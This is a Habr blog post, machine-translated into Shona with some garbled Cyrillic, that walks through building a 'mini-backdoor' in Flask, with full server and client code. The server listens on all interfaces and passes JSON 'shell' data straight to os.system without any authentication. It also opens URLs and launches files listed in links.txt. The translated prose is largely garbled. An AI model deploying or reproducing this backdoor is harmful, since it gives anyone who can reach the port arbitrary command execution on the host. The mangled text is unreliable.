Hei Habr!
Nguva pfupi yadarika ndakatarisa vhezheni yakadhindwa yechirongwa cherukova "Maitiro ekugadzira yako webhu application muFlask." Uye ndakafunga kubatanidza ruzivo rwangu mune chimwe chirongwa. Kwenguva refu ndakanga ndisingazive zvekunyora uye zano rakauya kwandiri: "Wadii kugadzira mini-backdoor muFlask?"
Sarudzo dzekutanga dzekushandisa uye kugona kweiyo backdoor pakarepo yakaonekwa mumusoro mangu. Asi ini ndakafunga kuita nekukurumidza runyorwa rwekumashure kugona:
- Ziva nzira yekuvhura mawebhusaiti
- Iva neraini rekuraira kuwana
- Kugona kuvhura zvirongwa, mafoto, mavhidhiyo
Saka, poindi yekutanga iri nyore kwazvo kushandisa uchishandisa webbrowser module. Ndakafunga kuita iyo yechipiri poindi ndichishandisa os module. Uye yechitatu iri zvakare kuburikidza neos module, asi ini ndichashandisa "zvinongedzo" (zvimwe pane izvo gare gare).
Kunyora sevha
Saka, *drumroll* yese server kodhi:
from flask import Flask, request
import webbrowser
import os
import re
app = Flask(__name__)
@app.route('/mycomp', methods=['POST'])
def hell():
json_string = request.json
if json_string['command'] == 'test':
return 'The server is running and waiting for commands...'
if json_string['command'] == 'openweb':
webbrowser.open(url='https://www.'+json_string['data'], new=0)
return 'Site opening ' + json_string['data'] + '...'
if json_string['command'] == 'shell':
os.system(json_string['data'])
return 'Command execution ' + json_string['data'] + '...'
if json_string['command'] == 'link':
links = open('links.txt', 'r')
for i in range(int(json_string['data'])):
link = links.readline()
os.system(link.split('>')[0])
return 'Launch ' + link.split('>')[1]
if __name__ == '__main__':
app.run(host='0.0.0.0')
Ndatorasa kodhi yese, yave nguva yekutsanangura kukosha kwayo.
Yese kodhi inomhanya pakombuta yemuno pachiteshi 5000. Kudyidzana nesevha, tinofanira kutumira chikumbiro cheJSON POST.
JSON chikumbiro chimiro:
{βcommandβ: βcomecommandβ, βdataβ: βsomedataβ}Zvakanaka, zvine musoro kuti 'kuraira' ndiwo murairo watinoda kuita. Uye 'data' ndiyo nharo dzemirairo.
Iwe unogona kunyora uye kutumira zvikumbiro zveJSON kuti zvibatane nevhavha pamaoko (zvikumbiro zvichakubatsira iwe). Kana iwe unogona kunyora console mutengi.
Kunyora mutengi
Code:
import requests
logo = ['nn',
'****** ********',
'******* *********',
'** ** ** **',
'** ** ** ** Written on Python',
'******* ** **',
'******** ** **',
'** ** ** ** Author: ROBOTD4',
'** ** ** **',
'** ** ** **',
'******** *********',
'******* ********',
'nn']
p = ''
iport = '192.168.1.2:5000'
host = 'http://' + iport + '/mycomp'
def test():
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
def start():
for i in logo:
print(i)
start()
test()
while True:
command = input('>')
if command == '':
continue
a = command.split()
if command == 'test':
dict = {'command': 'test', 'data': 0}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
if a[0] == 'shell':
for i in range(1, len(a)):
p = p + a[i] + ' '
dict = {'command': 'shell', 'data': p}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
p = ''
if a[0] == 'link':
if len(a) > 1:
dict = {'command': 'link', 'data': int(a[1])}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('ΠΠΎΠΌΠΌΠ°Π½Π΄Π° Π½Π΅ ΡΠΎΠ΄Π΅ΡΠΆΠΈΡ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΎΠ²!')
if a[0] == 'openweb':
if len(a) > 1:
dict = {'command': 'openweb', 'data': a[1]}
r = requests.post(host, json=dict)
if r.status_code == 200:
print (r.content.decode('utf-8'))
else:
print('ΠΠΎΠΌΠΌΠ°Π½Π΄Π° Π½Π΅ ΡΠΎΠ΄Π΅ΡΠΆΠΈΡ Π°ΡΠ³ΡΠΌΠ΅Π½ΡΠΎΠ²!')
if a[0] == 'set':
if a[1] == 'host':
ip = a[2] + ':5000'
if command == 'quit':
break
Tsananguro:
Chekutanga pane zvese, iyo module yekukumbira inotengeswa kunze kwenyika (yekudyidzana neseva). Pazasi pane tsananguro dzekutanga uye bvunzo mabasa. Uye ipapo kutenderera uko mashiripiti anoitika. Wakaverenga kodhi here? Saka iwe unonzwisisa zvinorehwa nemashiripiti anoitika mukutenderera. Pinda murairo - inoitwa. Shell - inoraira mutsara wekuraira (iyo logic iri pachiyero).
Edza - tarisa kana sevha iri kushanda (backdoor)
Link - kushandiswa kwe "shortcut"
Openweb - kuvhura webhusaiti
Rega - buda mutengi
Seta - kuseta iyo ip yekombuta yako pane yemuno network
Uye zvino zvakawanda nezve link.
Pane link.txt faira padivi pesevha. Iyo ine zvinongedzo (izere nzira) kune mafaera (mavhidhiyo, mafoto, zvirongwa).
Chimiro chakafanana neichi:
ΠΏΠΎΠ»Π½ΡΠΉ_ΠΏΡΡΡ>ΠΎΠΏΠΈΡΠ°Π½ΠΈΠ΅
ΠΏΠΎΠ»Π½ΡΠΉ_ΠΏΡΡΡ>ΠΎΠΏΠΈΡΠ°Π½ΠΈΠ΅
Mugumisiro
Isu tine sevha yekuseri yekudzora komputa pane network yemuno (mukati meiyo wi-fi network). Nehunyanzvi, isu tinogona kumhanya mutengi kubva kune chero mudziyo une muturikiri wepython.
PS Ndakawedzera murairo wakaiswa kuitira kuti kana komputa pane network yemuno yakapihwa imwe IP yakasiyana, inogona kuchinjwa yakananga mutengi.
Source: www.habr.com